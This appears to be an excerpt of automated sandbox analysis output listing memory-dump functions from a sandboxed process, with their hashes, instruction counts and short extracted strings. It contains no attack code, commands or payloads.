Snapshot File: hcaresult_9_2_6a20000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc4ef855e730dd8eef2a248324ea1d64eb45000a110b02e644749b673eb2d1a4
Instruction ID: c83b32430c4f338fd8d405e07e35d804960f8b9065f8eb9e7b94f07f0c48b5ce
Opcode Fuzzy Hash: dc4ef855e730dd8eef2a248324ea1d64eb45000a110b02e644749b673eb2d1a4
Instruction Fuzzy Hash: 6AA1A5B5E012288FEB68DF6AC94479DFBF2BF89304F14C0AAD409A7254DB345A85CF10

Function 06A2D028 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4554652700.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6a20000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d07f61ae33188328ea232d0e1f76141ba18fc24dc889f4869a92fa50768fc6c2
Instruction ID: dc22bda4d78484a73d7d404b4ddd25944683a0f404f4b11e343957e5d4cfb84f
Opcode Fuzzy Hash: d07f61ae33188328ea232d0e1f76141ba18fc24dc889f4869a92fa50768fc6c2
Instruction Fuzzy Hash: 5AA1A4B0E012298FEB68DF6AC944B9DFBF2AF89300F14C0AAD409A7255D7345A85CF50

Function 06A21191 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4554652700.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6a20000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b28bfc01c5e936cd9ee961dfca16cae8898495f5dee46baf482a49311bdb87f
Instruction ID: 8cbf6267d89de7d9e057165160f8bd70ddbde44c6abf22d649a53c59d0967416
Opcode Fuzzy Hash: 0b28bfc01c5e936cd9ee961dfca16cae8898495f5dee46baf482a49311bdb87f
Instruction Fuzzy Hash: 2781B074E412699FDBA5DF29D890BDDBBB2BF89300F1081EAD849A7254DB315E81CF40

Function 06A2D018 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4554652700.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6a20000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f65cc300ee69c734235cec5891c32be0e9e9db85f474e667b107c47b9397ffd
Instruction ID: 7b78df4f760bd0f5eeac4205ca61e2ee6bc4c2e4f11e5884a12b9cc14f47ca73
Opcode Fuzzy Hash: 2f65cc300ee69c734235cec5891c32be0e9e9db85f474e667b107c47b9397ffd
Instruction Fuzzy Hash: 5681A571E016288FEB68DF6AC944B9DFBF2AF89300F14C0AAD40DA7255DB344A85CF50

Function 06A2AA48 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4554652700.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6a20000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ee7880660fd1fc72b6c90cef67a014de5be18c7e0b5d411637091f0baba0f2c
Instruction ID: bb289789baa374b9f4e477985fb6ea0f691ea95f79c2785d23e72b4d722e1e31
Opcode Fuzzy Hash: 3ee7880660fd1fc72b6c90cef67a014de5be18c7e0b5d411637091f0baba0f2c
Instruction Fuzzy Hash: C571A771E006298FEB68DF6AC944B9DFBF2AF89304F14C0AAD50DA7254DB744A85CF50

Function 06A2B09F Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4554652700.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6a20000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da260c3e8b2f6a0feb4f8f725b9fb469ba8b2783ee21edb5fe67dcdb51175774
Instruction ID: 0a1943b2b6cbd9b80c6916f006f5fce857e50e9a176ed36207190209758ecd39
Opcode Fuzzy Hash: da260c3e8b2f6a0feb4f8f725b9fb469ba8b2783ee21edb5fe67dcdb51175774
Instruction Fuzzy Hash: 5A7197B0E006288FEB68DF6AC94479DFBF2AF89304F14C1AAD40DA7254DB344A85CF10

Function 06A285FB Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4554652700.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6a20000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 593a0e5d9ba8efd2b52b4f21af84c1318fe7442af6448ece0f1fe06f4674e41d
Instruction ID: 12feadf578b31ae2a170dba73179659fc957d7079f8b2c698a45c988fad3c0ff
Opcode Fuzzy Hash: 593a0e5d9ba8efd2b52b4f21af84c1318fe7442af6448ece0f1fe06f4674e41d
Instruction Fuzzy Hash: 0F41D2B0D002198FEB58DFAAD9547DEBBF2AF88300F14D06AD418BB254DB754946CF64

Function 06A2D663 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4554652700.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6a20000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5805e2d5ada27fa9bc48b66deae608df0e2b6110eda928e982d4457f85c63c0
Instruction ID: e90fc8d19d6bedaa8bed823c1c5632b3935983e14481a58a11c20426f826203a
Opcode Fuzzy Hash: c5805e2d5ada27fa9bc48b66deae608df0e2b6110eda928e982d4457f85c63c0
Instruction Fuzzy Hash: 394159B1E016288BEB58DF6BCD457DAFAF3AFC9300F14C1AAD50CA6254DB740A858F51

Function 06A2C378 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4554652700.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6a20000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba9b25017900afec6d9f6f8d79002fd43ae1db63bdb4499fad7d53f9ddff98ef
Instruction ID: 324f561ce6df4430bff00143e7ae169ce4f5b6769a1113ff93617b6ce4e835da
Opcode Fuzzy Hash: ba9b25017900afec6d9f6f8d79002fd43ae1db63bdb4499fad7d53f9ddff98ef
Instruction Fuzzy Hash: C74179B1E016188BEB58CF6BC9457DAFAF3AFC8304F04C1AAD50CA7255DB740A858F50

Function 06A2C9C8 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4554652700.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6a20000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20b5f0777fa0711ee8bf81c16dc4807595f430260873d46f1648829e342ec7ef
Instruction ID: 086a647d82054c7edbc0fe791543969ff8d545be9606b3c46ea676e95dd6244f
Opcode Fuzzy Hash: 20b5f0777fa0711ee8bf81c16dc4807595f430260873d46f1648829e342ec7ef
Instruction Fuzzy Hash: 514179B1E016188BEB58CF6BC9457D9FAF3AFC9310F14C1AAC50CA6255DB3409858F50

Function 06A2BD28 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4554652700.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6a20000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69facd3de220fa60fe65478dd1779cec018875d358712c9ed226410dbbb7dee5
Instruction ID: 0ce53c6b9b665193b92fcdd3eeb8597988977e68c556df92a91b4d5505e7f058
Opcode Fuzzy Hash: 69facd3de220fa60fe65478dd1779cec018875d358712c9ed226410dbbb7dee5
Instruction Fuzzy Hash: 584158B1E016188BEB58CF6BD9457DAFBF3AFC9304F14C1AAD50CA6254DB740A858F50

Function 06A2B6E7 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4554652700.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6a20000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8087d405a31cd2b98dd6e7e5b3fe756c97bc532b100cabc231ad35a8f4bf0ede
Instruction ID: 1e553269d7a61422e7ea7606fd9c1134bcf36732c3c9b925d4fc29ed4eba0886
Opcode Fuzzy Hash: 8087d405a31cd2b98dd6e7e5b3fe756c97bc532b100cabc231ad35a8f4bf0ede
Instruction Fuzzy Hash: 474148B1E016188BEB58CF6BD9457DAFAF3AFC9304F14C1AAC50CA6264DB740A858F50

Function 06A2A407 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4554652700.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6a20000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80acd2ed0c4d74b9537aa3f365db038fadac3dca376958246471a56aeb6aa70e
Instruction ID: de235e98ad35fcc7161bade1256eae04065f1ab6b7cd3ae3f5cfd7e3e627518c
Opcode Fuzzy Hash: 80acd2ed0c4d74b9537aa3f365db038fadac3dca376958246471a56aeb6aa70e
Instruction Fuzzy Hash: BB4158B1E016188BEB58CF6BC9457DAFAF3AFC8300F14C1AAD50CA6264DB740A858F50

Function 06A20D39 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4554652700.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6a20000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23615e1e13bc019f32f73d676156e590b9ba5dd7bb4592e55da4c59169dad2a4
Instruction ID: d02f135522cbf441b220f9a894e1baaf22c943327d4fbe9978ab25fc8415db8b
Opcode Fuzzy Hash: 23615e1e13bc019f32f73d676156e590b9ba5dd7bb4592e55da4c59169dad2a4
Instruction Fuzzy Hash: 0A41F4B0E01248CFDB58DFEAD9406EEBBF2AF88300F20D12AD419AB254DB344946CF50

Function 014B6E67 Relevance: 10.5, Strings: 8, Instructions: 469
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(osq, xrefs: 014B6F7D
(osq, xrefs: 014B6E96
(osq, xrefs: 014B6F51
,wq, xrefs: 014B72F8
(osq, xrefs: 014B701A
,wq, xrefs: 014B7308
(osq, xrefs: 014B7367
(osq, xrefs: 014B7377

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID: (osq$(osq$(osq$(osq$(osq$(osq$,wq$,wq
API String ID: 0-1935560061
Opcode ID: f9c40f540c70a1ff66f6b9f0e008f552927b9ccb1866bc9c094f69f3d889b18a
Instruction ID: 46052dc3565e3c2a7febbb609a048a4d65ddfbe869baeb85e063b170a55f700c
Opcode Fuzzy Hash: f9c40f540c70a1ff66f6b9f0e008f552927b9ccb1866bc9c094f69f3d889b18a
Instruction Fuzzy Hash: 40123871A002099FCB19CF69D9C4A9EBBF2FF88315F15855AE9059B3A1DB30ED41CB60

Function 014B87E9 Relevance: 4.1, Strings: 3, Instructions: 347
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'sq, xrefs: 014B8811
4'sq, xrefs: 014B8837
;sq, xrefs: 014B8C2C

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID: 4'sq$4'sq$;sq
API String ID: 0-111817264
Opcode ID: 17f60e0b2fc5a3ac756cfa4b0d6d3f54ace6d8f9c733d8e586633b1a3f4bf272
Instruction ID: f4359d9eeb2622b4d1c3f5a231b5434e003d4de5058f43bf796f01b37bda52b0
Opcode Fuzzy Hash: 17f60e0b2fc5a3ac756cfa4b0d6d3f54ace6d8f9c733d8e586633b1a3f4bf272
Instruction Fuzzy Hash: D6B12FB07141028FEB159B3DC9D8BBA7A9EAF85600F14446BE602DB3B1EE75CC428761

Function 014B77F0 Relevance: 3.2, Strings: 2, Instructions: 698
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$sq, xrefs: 014B8314
$sq, xrefs: 014B8337

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID: $sq$$sq
API String ID: 0-1184984226
Opcode ID: 22641a186120c1ef594143a01cf77f32d764c1c8372294193ee5d3144723e8cb
Instruction ID: ec7221c1ac3cf95f0c327ac38ee3e20c5a5b59d0451d870c5fe1fe3eb1651738
Opcode Fuzzy Hash: 22641a186120c1ef594143a01cf77f32d764c1c8372294193ee5d3144723e8cb
Instruction Fuzzy Hash: BC5203B4A006198FEB159BE4CC50B9EBB76FF84300F1081AAD10A673A5DF359E85EF51

Function 014B56A8 Relevance: 2.8, Strings: 2, Instructions: 265COMMON

Download Yara Rule

Strings

Hwq, xrefs: 014B57C6
Hwq, xrefs: 014B5793

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID: Hwq$Hwq
API String ID: 0-741242263
Opcode ID: 8899a0bd48375509d01a0db0abe680d8414102a5e605fdd92851a182ff33d88c
Instruction ID: d9a009025167e31db48732c50477162364cececee864e8bc68778533fbb84c9b
Opcode Fuzzy Hash: 8899a0bd48375509d01a0db0abe680d8414102a5e605fdd92851a182ff33d88c
Instruction Fuzzy Hash: A191B4307042548FDB169F78D8947AFBBE6BF89300F14896AE5468B3A1DF358C11DBA1

Function 06A223E0 Relevance: 2.7, Strings: 2, Instructions: 229COMMON

Download Yara Rule

Strings

LRsq, xrefs: 06A223FC
LRsq, xrefs: 06A22529

Memory Dump Source

Source File: 00000009.00000002.4554652700.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6a20000_00.jbxd

Similarity

API ID:
String ID: LRsq$LRsq
API String ID: 0-2113534932
Opcode ID: 7093ca81c8662e07d7204321fec3cb51206ae1f90d4903dd9e1b42ca283cb20e
Instruction ID: 1480a10798fc3b74a104666754b6c5c2e00f34f6cb6e52578160a0da2bec984d
Opcode Fuzzy Hash: 7093ca81c8662e07d7204321fec3cb51206ae1f90d4903dd9e1b42ca283cb20e
Instruction Fuzzy Hash: FC81C175B501268FCB48EF7CD994A6E7BB2AF88600B1585A9E405DB3B5DB30ED01CB90

Function 014B5C08 Relevance: 2.7, Strings: 2, Instructions: 229COMMON

Download Yara Rule

Strings

,wq, xrefs: 014B5CDE
,wq, xrefs: 014B5CE8

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID: ,wq$,wq
API String ID: 0-1895925779
Opcode ID: 3486e48dd4d9136e6b19e31d09105a02aeb29d4d9cb36bf12deb7a5504cbae55
Instruction ID: 42fc541229bd42a4f4235b779d019ada8dcbcc236cd5710fc81597b9b62f283f
Opcode Fuzzy Hash: 3486e48dd4d9136e6b19e31d09105a02aeb29d4d9cb36bf12deb7a5504cbae55
Instruction Fuzzy Hash: F6817C31A045058FDB15DFADC8C8AAAFBB6BF89210B14C66AD505DF371DB31E842CB61

Function 06A29510 Relevance: 2.7, Strings: 2, Instructions: 213COMMON

Download Yara Rule

Strings

(&sq, xrefs: 06A2962B
(wq, xrefs: 06A296EA

Memory Dump Source

Source File: 00000009.00000002.4554652700.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6a20000_00.jbxd

Similarity

API ID:
String ID: (&sq$(wq
API String ID: 0-153982265
Opcode ID: dd9ae91b1f42517bb8eddfeef7672179816c0801c381d6f253d91c80da052aa1
Instruction ID: 6ead1f1f261d29d221b11bfa482f103bc2ab544295315ad242300c44f2fa8b34
Opcode Fuzzy Hash: dd9ae91b1f42517bb8eddfeef7672179816c0801c381d6f253d91c80da052aa1
Instruction Fuzzy Hash: 51719431F002195BDF59EBA9C8506AEBBF6AFC8700F144429E405AB380DF749D46C7D5

Function 014B3428 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

Xwq, xrefs: 014B345E
Xwq, xrefs: 014B3435

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID: Xwq$Xwq
API String ID: 0-2617233878
Opcode ID: 4f9e3dcb1956ee8e6e3c5d922e89bc365c7b77dd7861d2cc4a40d9b4f9eb1067
Instruction ID: 6e43b02bcaa3f881d2fd0546a784b5521d2b4683cb4318514980001b8463a8b5
Opcode Fuzzy Hash: 4f9e3dcb1956ee8e6e3c5d922e89bc365c7b77dd7861d2cc4a40d9b4f9eb1067
Instruction Fuzzy Hash: ED31C675B042258BDF194E6F49D42BFA9AABBC4250F14453BD906C33A4DF78CC464671

Function 014B9C3F Relevance: 1.7, Strings: 1, Instructions: 455COMMON

Download Yara Rule

Strings

(osq, xrefs: 014B9C78

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID: (osq
API String ID: 0-609861455
Opcode ID: 2b3762e72a9cc25fb765d14128378af53742fbbd9acc428645ce769412e0c9c8
Instruction ID: 593a5483adeeb8b14906da9f589c6e9a39e83b49ea6b6ca803b60fe2b7063369
Opcode Fuzzy Hash: 2b3762e72a9cc25fb765d14128378af53742fbbd9acc428645ce769412e0c9c8
Instruction Fuzzy Hash: 46126B71A00109DFCB15CF68C9C4AAEBBF2BF88354F258956E9459B3A1D730E881DB61

Function 014B0C8F Relevance: 1.7, Strings: 1, Instructions: 406COMMON

Download Yara Rule

Strings

LRsq, xrefs: 014B0E5E

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID: LRsq
API String ID: 0-3165563352
Opcode ID: eba247dd471747aee5421a16992106a86f7a9f64a95ddc7c6c2e06cc3192b5ab
Instruction ID: c1d63928d1394ae841bfd060b5b3b33418cd00965b74349bb215febb26b0d162
Opcode Fuzzy Hash: eba247dd471747aee5421a16992106a86f7a9f64a95ddc7c6c2e06cc3192b5ab
Instruction Fuzzy Hash: A722B474901619CFCB54EF68E894B9DBBB2FF89315F108AAAE809A7354DB305D85CF40

Function 014B0CA0 Relevance: 1.6, Strings: 1, Instructions: 395COMMON

Download Yara Rule

Strings

LRsq, xrefs: 014B0E5E

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID: LRsq
API String ID: 0-3165563352
Opcode ID: 5a17fa40afc7ff5c1eb8de6d6e20d88e704bc1c4362440cd462e99e7e1737cb7
Instruction ID: 35b4a41c7052ef8ecf4795a9cdc4fb65770ecbfaaafc15acb979933ca8d3ad80
Opcode Fuzzy Hash: 5a17fa40afc7ff5c1eb8de6d6e20d88e704bc1c4362440cd462e99e7e1737cb7
Instruction Fuzzy Hash: 9622B574901619CFCB54EF68E894B9DBBB2FF89315F108AAAE809A7354DB305D85CF40

Function 069F8174 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 069F82B6

Memory Dump Source

Source File: 00000009.00000002.4553601503.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_69f0000_00.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e10f982a650963a9801fe7e630901f4d49c4548391a2902056370f72e50eb463
Instruction ID: ad4e93467ad85055d17a9857ab886f5194d2fabb951bcfa1d4e1de07873259dc
Opcode Fuzzy Hash: e10f982a650963a9801fe7e630901f4d49c4548391a2902056370f72e50eb463
Instruction Fuzzy Hash: B7119A74E111098FDB84DBE8D684AEDBBF5FB88314F159524E904A7641D771E882CB60

Function 014BA1F8 Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

4'sq, xrefs: 014BA273

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID: 4'sq
API String ID: 0-1075809040
Opcode ID: 0c8fb099110941063ca40a8ac208dc40f98f5432ce712f99ff4bb699488c1e00
Instruction ID: b9f8b5996904ea9fb9237b1675e0a94c6dae3bb99e1653a85530f9f0230bb383
Opcode Fuzzy Hash: 0c8fb099110941063ca40a8ac208dc40f98f5432ce712f99ff4bb699488c1e00
Instruction Fuzzy Hash: 5A4139756002159FCB19DF69D888BAE7BB5BF88710F20046AE905CB3B1CB71DD51CBA1

Function 014BA818 Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddc4fcaf6f00f6894770f745bfa28119b1351191f8f2da56fc8d033d5b6d3855
Instruction ID: a448b6c56c4810f8c19e61255beb4c8a890e35c953b24206c6093e31e4374ade
Opcode Fuzzy Hash: ddc4fcaf6f00f6894770f745bfa28119b1351191f8f2da56fc8d033d5b6d3855
Instruction Fuzzy Hash: C7D1FB75A041149FCB05CFACC9C499DBBF6BF88310B2A885AE655AB371C735EC91CB60

Function 014B7438 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a87ebbbdb983474acb13dfebd9d3ac4a78929d99458212f4d2da4a6ea4af1519
Instruction ID: 1cf01e9a817409e82298ce51f67154c23ef5b991f0b9e51fde4de8b27ab81aca
Opcode Fuzzy Hash: a87ebbbdb983474acb13dfebd9d3ac4a78929d99458212f4d2da4a6ea4af1519
Instruction Fuzzy Hash: 7D711B347002458FDB15DF2CC8D8AEA7BE5AF89212F1544AAE506DB3B1DB74DC52CBA0

Function 014BCEC7 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0c526acfcfce95aa2551a0079dad07a7477940b95c1ba5866bef2468b8327f9
Instruction ID: 62850be5909a09c2e0c26075574827251f2268962ad7c04f254b69d0e06b679f
Opcode Fuzzy Hash: f0c526acfcfce95aa2551a0079dad07a7477940b95c1ba5866bef2468b8327f9
Instruction Fuzzy Hash: 2851AF708A574BCFC3442F34E5AC2AA7BB5FB8F723746AE40B01F86021CB315869DA51

Function 014BCED8 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2008248aa3d4dda648f4115203471a787e18457f33459a8100c14d63d0b2f72
Instruction ID: 0f64957794e4f96775b0521c49348c32c004b42017bf76b92a9ba61d481a776c
Opcode Fuzzy Hash: e2008248aa3d4dda648f4115203471a787e18457f33459a8100c14d63d0b2f72
Instruction Fuzzy Hash: 6D5190708A174BCFC3443F34E5AC2AABBB5FB8F727742AE04B01F85025CB3158659A51

Function 014B990F Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 400f01d5f77d95b5899620c03072c2c8bbb23a19835c381c9a17f3dc6bd0e99c
Instruction ID: 140e0efbb07f9336e53260b35875627d7daf37d8e0c227f8c71a96c79b9c885d
Opcode Fuzzy Hash: 400f01d5f77d95b5899620c03072c2c8bbb23a19835c381c9a17f3dc6bd0e99c
Instruction Fuzzy Hash: 6A514AB4E002599FCF05CFA8C884ADEBFB2BF8C304F148556EA05AB361D7749955CB60

Function 014BE2D9 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58bc3f3b205a3faf9e7fa5e7211e8093764c154828302ff5c6dae03b291a031d
Instruction ID: 51963c596302db8f0c9260e5b49297a7246069899f8ffddb3a8a483186ee9bf3
Opcode Fuzzy Hash: 58bc3f3b205a3faf9e7fa5e7211e8093764c154828302ff5c6dae03b291a031d
Instruction Fuzzy Hash: 2D51FFB4D01218CBDB15DFE4D894AEEBBB2FF88300F208529D805AB395DB355985DF40

Function 014BCD10 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ae35ac9823b21b97ca7925e5caea662fe41fc8974514a8448d2c4a54547a00f
Instruction ID: 2dc12c0862f908298487ea9e20386ae5a8641d31bc802e79149a754f24a01d17
Opcode Fuzzy Hash: 3ae35ac9823b21b97ca7925e5caea662fe41fc8974514a8448d2c4a54547a00f
Instruction Fuzzy Hash: 3F519474E01208DFDB58DFA9D9849DDBBF2BF89310F24816AE419AB365DB30A941CF50

Function 06A2DCC0 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4554652700.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6a20000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c472c304121e131fde9a146f3a8e20ceb3c2dfedc820c41926105b6f44a85ffa
Instruction ID: 2068e190b7b92dc98bdd43dd999368bb7143ea0be76f6126f7ccbd54c0d0fb37
Opcode Fuzzy Hash: c472c304121e131fde9a146f3a8e20ceb3c2dfedc820c41926105b6f44a85ffa
Instruction Fuzzy Hash: 2C415A7590132ACFDB04BFA4D56C7EEBBB1EB8A716F408829D101672E4CB780A44CF91

Function 014B3908 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
